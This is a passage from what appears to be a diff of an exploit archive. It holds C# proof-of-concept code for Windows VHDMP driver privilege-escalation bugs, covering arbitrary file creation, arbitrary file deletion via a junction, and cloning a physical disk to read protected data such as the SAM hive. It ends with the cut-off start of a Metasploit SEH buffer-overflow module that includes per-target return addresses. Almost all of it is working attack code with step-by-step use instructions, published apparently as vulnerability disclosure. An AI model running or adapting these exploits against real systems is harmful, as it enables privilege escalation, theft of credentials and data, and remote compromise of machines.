Static = 0,
Dynamic = 1
}
[StructLayout(LayoutKind.Sequential)]
public sealed class SecurityQualityOfService
{
int Length;
public SecurityImpersonationLevel ImpersonationLevel;
public SecurityContextTrackingMode ContextTrackingMode;
[MarshalAs(UnmanagedType.U1)]
public bool EffectiveOnly;
public SecurityQualityOfService()
{
Length = Marshal.SizeOf(this);
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class ObjectAttributes : IDisposable
{
int Length;
IntPtr RootDirectory;
IntPtr ObjectName;
AttributeFlags Attributes;
IntPtr SecurityDescriptor;
IntPtr SecurityQualityOfService;
private static IntPtr AllocStruct(object s)
{
int size = Marshal.SizeOf(s);
IntPtr ret = Marshal.AllocHGlobal(size);
Marshal.StructureToPtr(s, ret, false);
return ret;
}
private static void FreeStruct(ref IntPtr p, Type struct_type)
{
Marshal.DestroyStructure(p, struct_type);
Marshal.FreeHGlobal(p);
p = IntPtr.Zero;
}
public ObjectAttributes() : this(AttributeFlags.None)
{
}
public ObjectAttributes(string object_name, AttributeFlags attributes) : this(object_name, attributes, null, null, null)
{
}
public ObjectAttributes(AttributeFlags attributes) : this(null, attributes, null, null, null)
{
}
public ObjectAttributes(string object_name) : this(object_name, AttributeFlags.CaseInsensitive, null, null, null)
{
}
public ObjectAttributes(string object_name, AttributeFlags attributes, SafeKernelObjectHandle root, SecurityQualityOfService sqos, GenericSecurityDescriptor security_descriptor)
{
Length = Marshal.SizeOf(this);
if (object_name != null)
{
ObjectName = AllocStruct(new UnicodeString(object_name));
}
Attributes = attributes;
if (sqos != null)
{
SecurityQualityOfService = AllocStruct(sqos);
}
if (root != null)
RootDirectory = root.DangerousGetHandle();
if (security_descriptor != null)
{
byte[] sd_binary = new byte[security_descriptor.BinaryLength];
security_descriptor.GetBinaryForm(sd_binary, 0);
SecurityDescriptor = Marshal.AllocHGlobal(sd_binary.Length);
Marshal.Copy(sd_binary, 0, SecurityDescriptor, sd_binary.Length);
}
}
public void Dispose()
{
if (ObjectName != IntPtr.Zero)
{
FreeStruct(ref ObjectName, typeof(UnicodeString));
}
if (SecurityQualityOfService != IntPtr.Zero)
{
FreeStruct(ref SecurityQualityOfService, typeof(SecurityQualityOfService));
}
if (SecurityDescriptor != IntPtr.Zero)
{
Marshal.FreeHGlobal(SecurityDescriptor);
SecurityDescriptor = IntPtr.Zero;
}
GC.SuppressFinalize(this);
}
~ObjectAttributes()
{
Dispose();
}
}
[DllImport("ntdll.dll")]
public static extern int NtOpenFile(
out IntPtr FileHandle,
FileAccessRights DesiredAccess,
ObjectAttributes ObjAttr,
[In] [Out] IoStatus IoStatusBlock,
ShareMode ShareAccess,
FileOpenOptions OpenOptions);
public static void StatusToNtException(int status)
{
if (status < 0)
{
throw new NtException(status);
}
}
public class NtException : ExternalException
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string modulename);
[Flags]
enum FormatFlags
{
AllocateBuffer = 0x00000100,
FromHModule = 0x00000800,
FromSystem = 0x00001000,
IgnoreInserts = 0x00000200
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int FormatMessage(
FormatFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
out IntPtr lpBuffer,
int nSize,
IntPtr Arguments
);
[DllImport("kernel32.dll")]
private static extern IntPtr LocalFree(IntPtr p);
private static string StatusToString(int status)
{
IntPtr buffer = IntPtr.Zero;
try
{
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
{
return Marshal.PtrToStringUni(buffer);
}
}
finally
{
if (buffer != IntPtr.Zero)
{
LocalFree(buffer);
}
}
return String.Format("Unknown Error: 0x{0:X08}", status);
}
public NtException(int status) : base(StatusToString(status))
{
}
}
public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid
{
public SafeHGlobalBuffer(int length)
: this(Marshal.AllocHGlobal(length), length, true)
{
}
public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle)
: base(owns_handle)
{
Length = length;
SetHandle(buffer);
}
public int Length
{
get; private set;
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
Marshal.FreeHGlobal(handle);
handle = IntPtr.Zero;
}
return true;
}
}
public class SafeStructureBuffer : SafeHGlobalBuffer
{
Type _type;
public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value))
{
_type = value.GetType();
Marshal.StructureToPtr(value, handle, false);
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
Marshal.DestroyStructure(handle, _type);
}
return base.ReleaseHandle();
}
}
public class SafeStructureOutBuffer<T> : SafeHGlobalBuffer
{
public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T)))
{
}
public T Result
{
get
{
if (IsInvalid)
throw new ObjectDisposedException("handle");
return Marshal.PtrToStructure<T>(handle);
}
}
}
public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit)
{
AttributeFlags flags = AttributeFlags.CaseInsensitive;
if (inherit)
flags |= AttributeFlags.Inherit;
using (ObjectAttributes obja = new ObjectAttributes(name, flags))
{
IntPtr handle;
IoStatus iostatus = new IoStatus();
int status = NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions);
StatusToNtException(status);
return new SafeFileHandle(handle, true);
}
}
[DllImport("ntdll.dll")]
public static extern int NtDeviceIoControlFile(
SafeFileHandle FileHandle,
IntPtr Event,
IntPtr ApcRoutine,
IntPtr ApcContext,
[Out] IoStatus IoStatusBlock,
uint IoControlCode,
byte[] InputBuffer,
int InputBufferLength,
byte[] OutputBuffer,
int OutputBufferLength
);
[DllImport("ntdll.dll")]
public static extern int NtFsControlFile(
SafeFileHandle FileHandle,
IntPtr Event,
IntPtr ApcRoutine,
IntPtr ApcContext,
[Out] IoStatus IoStatusBlock,
uint FSControlCode,
[In] byte[] InputBuffer,
int InputBufferLength,
[Out] byte[] OutputBuffer,
int OutputBufferLength
);
[DllImport("ntdll.dll")]
static extern int NtCreateDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);
[DllImport("ntdll.dll")]
static extern int NtOpenDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);
const int ProcessDeviceMap = 23;
[DllImport("ntdll.dll")]
static extern int NtSetInformationProcess(
IntPtr ProcessHandle,
int ProcessInformationClass,
byte[] ProcessInformation,
int ProcessInformationLength);
static byte[] StructToBytes(object o)
{
int size = Marshal.SizeOf(o);
IntPtr p = Marshal.AllocHGlobal(size);
try
{
Marshal.StructureToPtr(o, p, false);
byte[] ret = new byte[size];
Marshal.Copy(p, ret, 0, size);
return ret;
}
finally
{
if (p != IntPtr.Zero)
Marshal.FreeHGlobal(p);
}
}
static byte[] GetBytes(string s)
{
return Encoding.Unicode.GetBytes(s + "\0");
}
static SafeKernelObjectHandle CreateDirectory(SafeKernelObjectHandle root, string path)
{
using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, root, null, null))
{
IntPtr handle;
StatusToNtException(NtCreateDirectoryObject(out handle, DirectoryAccessRights.GenericAll, obja));
return new SafeKernelObjectHandle(handle, true);
}
}
static SafeKernelObjectHandle OpenDirectory(string path)
{
using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive))
{
IntPtr handle;
StatusToNtException(NtOpenDirectoryObject(out handle, DirectoryAccessRights.MaximumAllowed, obja));
return new SafeKernelObjectHandle(handle, true);
}
}
[DllImport("ntdll.dll")]
static extern int NtCreateSymbolicLinkObject(
out IntPtr LinkHandle,
GenericAccessRights DesiredAccess,
ObjectAttributes ObjectAttributes,
UnicodeString DestinationName
);
static SafeKernelObjectHandle CreateSymbolicLink(SafeKernelObjectHandle directory, string path, string target)
{
using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, directory, null, null))
{
IntPtr handle;
StatusToNtException(NtCreateSymbolicLinkObject(out handle, GenericAccessRights.MaximumAllowed, obja, new UnicodeString(target)));
return new SafeKernelObjectHandle(handle, true);
}
}
static void SetDosDirectory(SafeKernelObjectHandle directory)
{
IntPtr p = directory.DangerousGetHandle();
byte[] data = null;
if (IntPtr.Size == 4)
{
data = BitConverter.GetBytes(p.ToInt32());
}
else
{
data = BitConverter.GetBytes(p.ToInt64());
}
StatusToNtException(NtSetInformationProcess(new IntPtr(-1), ProcessDeviceMap, data, data.Length));
}
enum StorageDeviceType
{
Unknown = 0,
Iso = 1,
Vhd = 2,
Vhdx = 3,
VhdSet = 4,
}
[StructLayout(LayoutKind.Sequential)]
struct VirtualStorageType
{
public StorageDeviceType DeviceId;
public Guid VendorId;
}
enum OpenVirtualDiskFlag
{
None = 0,
NoParents = 1,
BlankFile = 2,
BootDrive = 4,
CachedIo = 8,
DiffChain = 0x10,
ParentcachedIo = 0x20,
VhdSetFileOnly = 0x40,
}
enum CreateVirtualDiskVersion
{
Unspecified = 0,
Version1 = 1,
Version2 = 2,
Version3 = 3,
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct CreateVirtualDiskParameters
{
public CreateVirtualDiskVersion Version;
public Guid UniqueId;
public ulong MaximumSize;
public uint BlockSizeInBytes;
public uint SectorSizeInBytes;
public uint PhysicalSectorSizeInBytes;
[MarshalAs(UnmanagedType.LPWStr)]
public string ParentPath;
[MarshalAs(UnmanagedType.LPWStr)]
public string SourcePath;
// Version 2 on
public OpenVirtualDiskFlag OpenFlags;
public VirtualStorageType ParentVirtualStorageType;
public VirtualStorageType SourceVirtualStorageType;
public Guid ResiliencyGuid;
// Version 3 on
[MarshalAs(UnmanagedType.LPWStr)]
public string SourceLimitPath;
public VirtualStorageType BackingStorageType;
}
enum VirtualDiskAccessMask
{
None = 0,
AttachRo = 0x00010000,
AttachRw = 0x00020000,
Detach = 0x00040000,
GetInfo = 0x00080000,
Create = 0x00100000,
MetaOps = 0x00200000,
Read = 0x000d0000,
All = 0x003f0000
}
enum CreateVirtualDiskFlag
{
None = 0x0,
FullPhysicalAllocation = 0x1,
PreventWritesToSourceDisk = 0x2,
DoNotcopyMetadataFromParent = 0x4,
CreateBackingStorage = 0x8,
UseChangeTrackingSourceLimit = 0x10,
PreserveParentChangeTrackingState = 0x20,
}
[DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
static extern int CreateVirtualDisk(
[In] ref VirtualStorageType VirtualStorageType,
string Path,
VirtualDiskAccessMask VirtualDiskAccessMask,
[In] byte[] SecurityDescriptor,
CreateVirtualDiskFlag Flags,
uint ProviderSpecificFlags,
[In] ref CreateVirtualDiskParameters Parameters,
IntPtr Overlapped,
out IntPtr Handle
);
static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
static SafeFileHandle CreateVHD(string path)
{
VirtualStorageType vhd_type = new VirtualStorageType();
vhd_type.DeviceId = StorageDeviceType.Vhd;
vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
ps.Version = CreateVirtualDiskVersion.Version1;
ps.SectorSizeInBytes = 512;
ps.MaximumSize = 100 * 1024 * 1024;
IntPtr hDisk;
int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
if (error != 0)
{
throw new Win32Exception(error);
}
return new SafeFileHandle(hDisk, true);
}
enum SetVirtualDiskInfoVersion
{
Unspecified = 0,
ParentPath = 1,
Identified = 2,
ParentPathWithDepth = 3,
PhysicalSectionSize = 4,
VirtualDiskId = 5,
ChangeTrackingState = 6,
ParentLocator = 7,
}
[StructLayout(LayoutKind.Sequential)]
struct SetVirtualDiskInfo
{
public SetVirtualDiskInfoVersion Version;
[MarshalAs(UnmanagedType.Bool)]
public bool ChangeTrackingEnabled;
}
[DllImport("virtdisk.dll", CharSet = CharSet.Unicode)]
static extern int SetVirtualDiskInformation(
SafeFileHandle VirtualDiskHandle,
ref SetVirtualDiskInfo VirtualDiskInfo
);
static List<SafeKernelObjectHandle> CreateChainForPath(string path)
{
string[] parts = path.Split('\\');
List<SafeKernelObjectHandle> ret = new List<SafeKernelObjectHandle>();
SafeKernelObjectHandle curr = CreateDirectory(null, null);
ret.Add(curr);
foreach (string part in parts)
{
curr = CreateDirectory(curr, part);
ret.Add(curr);
}
return ret;
}
static void Main(string[] args)
{
try
{
string vhd_path = Path.GetFullPath("test.vhd");
File.Delete(vhd_path);
File.Delete(vhd_path + ".rct");
File.Delete(vhd_path + ".mrt");
Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path);
List<SafeKernelObjectHandle> chain = CreateChainForPath(Path.GetDirectoryName(vhd_path));
SafeKernelObjectHandle rct_symlink = CreateSymbolicLink(chain.Last(), Path.GetFileName(vhd_path) + ".rct", @"\SystemRoot\abc.txt");
SafeKernelObjectHandle mrt_symlink = CreateSymbolicLink(chain.Last(), Path.GetFileName(vhd_path) + ".mrt", @"\SystemRoot\xyz.txt");
using (SafeFileHandle handle = CreateVHD(vhd_path))
{
// Write dummy files for when the kernel impersonates us (and kills the per-process device map)
File.WriteAllBytes(vhd_path + ".rct", new byte[0]);
File.WriteAllBytes(vhd_path + ".mrt", new byte[0]);
SetVirtualDiskInfo disk_info = new SetVirtualDiskInfo();
disk_info.Version = SetVirtualDiskInfoVersion.ChangeTrackingState;
disk_info.ChangeTrackingEnabled = true;
SetDosDirectory(chain.First());
int error = SetVirtualDiskInformation(handle, ref disk_info);
chain[1].Close();
if (error != 0)
{
throw new Win32Exception(error);
}
}
if (!File.Exists(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "abc.txt")))
{
Console.WriteLine("[ERROR]: Didn't create arbitrary file");
}
else
{
Console.WriteLine("[SUCCESS]: Created arbitary file");
}
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

245
platforms/windows/local/40764.cs Executable file
View file

@ -0,0 +1,245 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=915
Windows: VHDMP ZwDeleteFile Arbitrary File Deletion EoP
Platform: Windows 10 10586 and 14393. No idea about 7 or 8.1 versions.
Class: Elevation of Privilege
Summary:
The VHDMP driver doesnt safely delete files leading to arbitrary file deletion which could result in EoP.
Description:
The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. There are numerous places where the driver calls ZwDeleteFile without specifying OBJ_FORCE_ACCESS_CHECK. This can be abused to delete any arbitrary file or directory on the filesystem by abusing symbolic links to redirect the delete file name to an arbitrary location. Also due to the behaviour of ZwDeleteFile we also dont need to play games with the DosDevices directory or anything like that, the system call opens the target file without specifying FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE flags, this means its possible to use a mount point even to redirect to a file due to the way reparsing works in the kernel.
Some places where ZwDeleteFile is called (based on 10586 x64 vhdmp.sys) are:
VhdmpiDeleteRctFiles
VhdmpiCleanupFileWrapper
VhdmpiInitializeVhdSetExtract
VhdmpiCtCreateEnableTrackingRequest
VhdmpiMultiStageSwitchLogFile
VhdmpiApplySnapshot
And much much more.
You get the idea, as far as I can tell none of these calls actually pass OBJ_FORCE_ACCESS_CHECK flag so all would be vulnerable (assuming you can specify the filename suitably). Note this doesnt need admin rights as we never mount the VHD. However you cant use it in a sandbox as opening the drive goes through multiple access checks.
While deleting files/directories might not seem to be too important you can use it to delete files in ProgramData or Windows\Temp which normally are OWNER RIGHTS locked to the creator. This could then be recreated by the user due to default DACLs and abuse functionality of other services/applications.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will delete an arbitrary file specified on the command line. It abuses the fact that during VHD creation the kernel will delete the .rct/.mrt files (this limits the poc to Win10 only). So we drop a test.vhd.rct mount point pointing at the target into the same directory and call create.
1) Compile the C# source code file.
2) Execute the poc on Win 10 passing the path to the file to delete. It will check that the file is present and cant be deleted.
3) It should print that it successfully deleted the file
Expected Result:
The target file isnt deleted, the VHD creation fails.
Observed Result:
The target file is deleted.
*/
using Microsoft.Win32.SafeHandles;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DfscTest
{
class Program
{
enum StorageDeviceType
{
Unknown = 0,
Iso = 1,
Vhd = 2,
Vhdx = 3,
VhdSet = 4,
}
[StructLayout(LayoutKind.Sequential)]
struct VirtualStorageType
{
public StorageDeviceType DeviceId;
public Guid VendorId;
}
enum OpenVirtualDiskFlag
{
None = 0,
NoParents = 1,
BlankFile = 2,
BootDrive = 4,
CachedIo = 8,
DiffChain = 0x10,
ParentcachedIo = 0x20,
VhdSetFileOnly = 0x40,
}
enum CreateVirtualDiskVersion
{
Unspecified = 0,
Version1 = 1,
Version2 = 2,
Version3 = 3,
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct CreateVirtualDiskParameters
{
public CreateVirtualDiskVersion Version;
public Guid UniqueId;
public ulong MaximumSize;
public uint BlockSizeInBytes;
public uint SectorSizeInBytes;
public uint PhysicalSectorSizeInBytes;
[MarshalAs(UnmanagedType.LPWStr)]
public string ParentPath;
[MarshalAs(UnmanagedType.LPWStr)]
public string SourcePath;
// Version 2 on
public OpenVirtualDiskFlag OpenFlags;
public VirtualStorageType ParentVirtualStorageType;
public VirtualStorageType SourceVirtualStorageType;
public Guid ResiliencyGuid;
// Version 3 on
[MarshalAs(UnmanagedType.LPWStr)]
public string SourceLimitPath;
public VirtualStorageType BackingStorageType;
}
enum VirtualDiskAccessMask
{
None = 0,
AttachRo = 0x00010000,
AttachRw = 0x00020000,
Detach = 0x00040000,
GetInfo = 0x00080000,
Create = 0x00100000,
MetaOps = 0x00200000,
Read = 0x000d0000,
All = 0x003f0000
}
enum CreateVirtualDiskFlag
{
None = 0x0,
FullPhysicalAllocation = 0x1,
PreventWritesToSourceDisk = 0x2,
DoNotcopyMetadataFromParent = 0x4,
CreateBackingStorage = 0x8,
UseChangeTrackingSourceLimit = 0x10,
PreserveParentChangeTrackingState = 0x20,
}
[DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
static extern int CreateVirtualDisk(
[In] ref VirtualStorageType VirtualStorageType,
string Path,
VirtualDiskAccessMask VirtualDiskAccessMask,
[In] byte[] SecurityDescriptor,
CreateVirtualDiskFlag Flags,
uint ProviderSpecificFlags,
[In] ref CreateVirtualDiskParameters Parameters,
IntPtr Overlapped,
out IntPtr Handle
);
static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
static SafeFileHandle CreateVHD(string path)
{
VirtualStorageType vhd_type = new VirtualStorageType();
vhd_type.DeviceId = StorageDeviceType.Vhd;
vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
ps.Version = CreateVirtualDiskVersion.Version1;
ps.SectorSizeInBytes = 512;
ps.MaximumSize = 100 * 1024 * 1024;
IntPtr hDisk;
int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
if (error != 0)
{
throw new Win32Exception(error);
}
return new SafeFileHandle(hDisk, true);
}
static void Main(string[] args)
{
try
{
if (args.Length < 1)
{
Console.WriteLine(@"[USAGE]: poc file\to\delete");
Environment.Exit(1);
}
string delete_path = Path.GetFullPath(args[0]);
if (!File.Exists(delete_path))
{
Console.WriteLine("[ERROR]: Specify a valid file to delete");
Environment.Exit(1);
}
try
{
File.Delete(delete_path);
Console.WriteLine("[ERROR]: Could already delete file, choose one which you normally can't delete");
Environment.Exit(1);
}
catch
{
}
string vhd_path = Path.GetFullPath("test.vhd");
File.Delete(vhd_path);
try
{
Directory.Delete(vhd_path + ".rct");
}
catch
{
}
Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path);
string cmdline = String.Format("/C mklink /J \"{0}.rct\" \"{1}\"", vhd_path, args[0]);
ProcessStartInfo start_info = new ProcessStartInfo("cmd", cmdline);
start_info.UseShellExecute = false;
Process p = Process.Start(start_info);
p.WaitForExit();
if (p.ExitCode != 0)
{
Console.WriteLine("[ERROR]: Can't create symlink");
Environment.Exit(1);
}
using (SafeFileHandle handle = CreateVHD(vhd_path))
{
}
if (File.Exists(delete_path))
{
Console.WriteLine("[ERROR]: Didn't delete arbitrary file");
}
else
{
Console.WriteLine("[SUCCESS]: Deleted arbitary file");
}
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

257
platforms/windows/local/40765.cs Executable file
View file

@ -0,0 +1,257 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=916
Windows: VHDMP Arbitrary Physical Disk Cloning EoP
Platform: Windows 10 10586. No idea about 14393, 7 or 8.1 versions.
Class: Elevation of Privilege
Summary:
The VHDMP driver doesnt open physical disk drives securely when creating a new VHD leading to information disclosure and EoP by allowing a user to access data theyre shouldnt have access to.
Description:
The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. When creating a new VHD its possible to specify a physical drive to clone from, youd assume that this feature would be limited to only administrators as accessing a physical disk for read access is limited to administrators group and system. However when calling VhdmpiTryOpenPhysicalDisk the driver uses ZwOpenFile and doesnt specify the OBJ_FORCE_ACCESS_CHECK flag. As no other administrator checks are done this means that a normal user can clone the physical disk to another file which they can read, to bypass DACL checks on NTFS and extract data such as the SAM hive.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will create a new VHDX from a specified physical drive. Note as this is a physical clone itll presumably not bypass Bitlocker, but thats not likely to be a major issue in a lot of cases.
1) Compile the C# source code file.
2) Execute the poc on Win 10 passing the path to the vhd file to create and the physical drive index of the drive to clone. If you run without arguments itll print which drives are available. You probably want to clone one drive to another otherwise youd likely run out of space (and of course have enough space). It also should work to copy the vhd out to a network share.
3) It should print that it created the clone of the drive. If you now mount that VHD somewhere else it should contain the original file systems of the original disk.
Expected Result:
The VHD creation fails with access denied.
Observed Result:
The physical disk is cloned successfully.
*/
using Microsoft.Win32.SafeHandles;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;
using System.Linq;
namespace Poc
{
class Program
{
enum StorageDeviceType
{
Unknown = 0,
Iso = 1,
Vhd = 2,
Vhdx = 3,
VhdSet = 4,
}
[StructLayout(LayoutKind.Sequential)]
struct VirtualStorageType
{
public StorageDeviceType DeviceId;
public Guid VendorId;
}
enum OpenVirtualDiskFlag
{
None = 0,
NoParents = 1,
BlankFile = 2,
BootDrive = 4,
CachedIo = 8,
DiffChain = 0x10,
ParentcachedIo = 0x20,
VhdSetFileOnly = 0x40,
}
enum CreateVirtualDiskVersion
{
Unspecified = 0,
Version1 = 1,
Version2 = 2,
Version3 = 3,
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct CreateVirtualDiskParameters
{
public CreateVirtualDiskVersion Version;
public Guid UniqueId;
public ulong MaximumSize;
public uint BlockSizeInBytes;
public uint SectorSizeInBytes;
[MarshalAs(UnmanagedType.LPWStr)]
public string ParentPath;
[MarshalAs(UnmanagedType.LPWStr)]
public string SourcePath;
}
enum VirtualDiskAccessMask
{
None = 0,
AttachRo = 0x00010000,
AttachRw = 0x00020000,
Detach = 0x00040000,
GetInfo = 0x00080000,
Create = 0x00100000,
MetaOps = 0x00200000,
Read = 0x000d0000,
All = 0x003f0000
}
enum CreateVirtualDiskFlag
{
None = 0x0,
FullPhysicalAllocation = 0x1,
PreventWritesToSourceDisk = 0x2,
DoNotcopyMetadataFromParent = 0x4,
CreateBackingStorage = 0x8,
UseChangeTrackingSourceLimit = 0x10,
PreserveParentChangeTrackingState = 0x20,
}
[DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
static extern int CreateVirtualDisk(
[In] ref VirtualStorageType VirtualStorageType,
string Path,
VirtualDiskAccessMask VirtualDiskAccessMask,
[In] byte[] SecurityDescriptor,
CreateVirtualDiskFlag Flags,
uint ProviderSpecificFlags,
[In] ref CreateVirtualDiskParameters Parameters,
IntPtr Overlapped,
out IntPtr Handle
);
static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
class PhysicalDisk
{
public uint Index { get; private set; }
public string Name { get; private set; }
public uint SectorSizeInBytes { get; private set; }
public ulong SizeInBytes { get; private set; }
public string Model { get; private set; }
public PhysicalDisk(ManagementObject wmi_object)
{
Index = (uint)wmi_object["Index"];
Name = (string)wmi_object["DeviceId"];
SectorSizeInBytes = (uint)wmi_object["BytesPerSector"];
SizeInBytes = (ulong)wmi_object["Size"];
Model = (string)wmi_object["Model"];
}
static string FormatHuman(ulong l)
{
if (l < 1000 * 1000)
return l.ToString();
l = l / (1000 * 1000);
if (l < 1000)
return String.Format("{0}MB", l);
l = l / (1000);
if (l < 1000)
return String.Format("{0}GB", l);
l = l / (1000);
if (l < 1000)
return String.Format("{0}TB", l);
return l.ToString();
}
public override string ToString()
{
return String.Format("{0}: Name={1}, Model={2}, Size={3}", Index, Name, Model, FormatHuman(SizeInBytes));
}
public static IEnumerable<PhysicalDisk> GetDisks()
{
SelectQuery selectQuery = new SelectQuery("Win32_DiskDrive");
ManagementObjectSearcher searcher =
new ManagementObjectSearcher(selectQuery);
foreach (ManagementObject disk in searcher.Get())
{
yield return new PhysicalDisk(disk);
}
}
}
static PhysicalDisk GetPhysicalDisk(uint index)
{
PhysicalDisk disk = PhysicalDisk.GetDisks().First(d => d.Index == index);
if (disk == null)
throw new InvalidOperationException(String.Format("Can't find physical disk index {0}", index));
return disk;
}
static void PrintPhysicalDisks()
{
foreach (PhysicalDisk disk in PhysicalDisk.GetDisks())
{
Console.WriteLine(disk);
}
}
static SafeFileHandle CreateVHD(string path, PhysicalDisk disk)
{
VirtualStorageType vhd_type = new VirtualStorageType();
vhd_type.DeviceId = StorageDeviceType.Vhdx;
vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
ps.Version = CreateVirtualDiskVersion.Version1;
ps.SectorSizeInBytes = disk.SectorSizeInBytes;
ps.MaximumSize = disk.SizeInBytes + (100 * 1024 * 1024);
ps.SourcePath = disk.Name;
IntPtr hDisk;
int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
if (error != 0)
{
throw new Win32Exception(error);
}
return new SafeFileHandle(hDisk, true);
}
static void Main(string[] args)
{
try
{
if (args.Length < 2)
{
Console.WriteLine(@"[USAGE]: poc output.vhdx driveno");
Console.WriteLine("Where driveno is one of the following indexes");
PrintPhysicalDisks();
Environment.Exit(1);
}
string vhd_path = Path.GetFullPath(args[0]);
vhd_path = Path.ChangeExtension(vhd_path, ".vhdx");
File.Delete(vhd_path);
PhysicalDisk disk = GetPhysicalDisk(uint.Parse(args[1]));
Console.WriteLine("[INFO]: Creating VHD {0} from {1}", vhd_path, disk.Name);
using (SafeFileHandle handle = CreateVHD(vhd_path, disk))
{
Console.WriteLine("[SUCCESS]: Created clone of physical disk");
}
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

288
platforms/windows/remote/40760.rb Executable file
View file

@ -0,0 +1,288 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy Internet Sharing Proxy Server 2.2 SEH buffer Overflow',
'Description' => %q{
This module exploits a SEH buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2
},
'Platform' => 'win',
'Author' =>
[
'tracyturben[at]gmail.com'
],
'License' => MSF_LICENSE,
'References' =>
[
[ %w{URL http://www.sharing-file.com/products.htm}]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 836,
'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c',
'StackAdjustment' => -3500,
},
'Targets'=>
[
[ 'Windows 10 32bit', { 'Ret' => 0x0043AD2C,'Offset' => 836,'Nops' => 44 } ],
[ 'Windows 8.1 32bit SP1', { 'Ret' => 0x0043AD30,'Offset' => 908 } ],
[ 'Windows 7 32bit SP1', { 'Ret' => 0x0043AD38,'Offset' => 884 } ],
[ 'Windows Vista 32bit SP2 ', { 'Ret' => 0x0043AD38,'Offset' => 864 } ]
],
'DefaultOptions'=>{
'RPORT'=> 1080,
'EXITFUNC'=> 'thread'
},
'DisclosureDate' => 'Nov 10 2016',
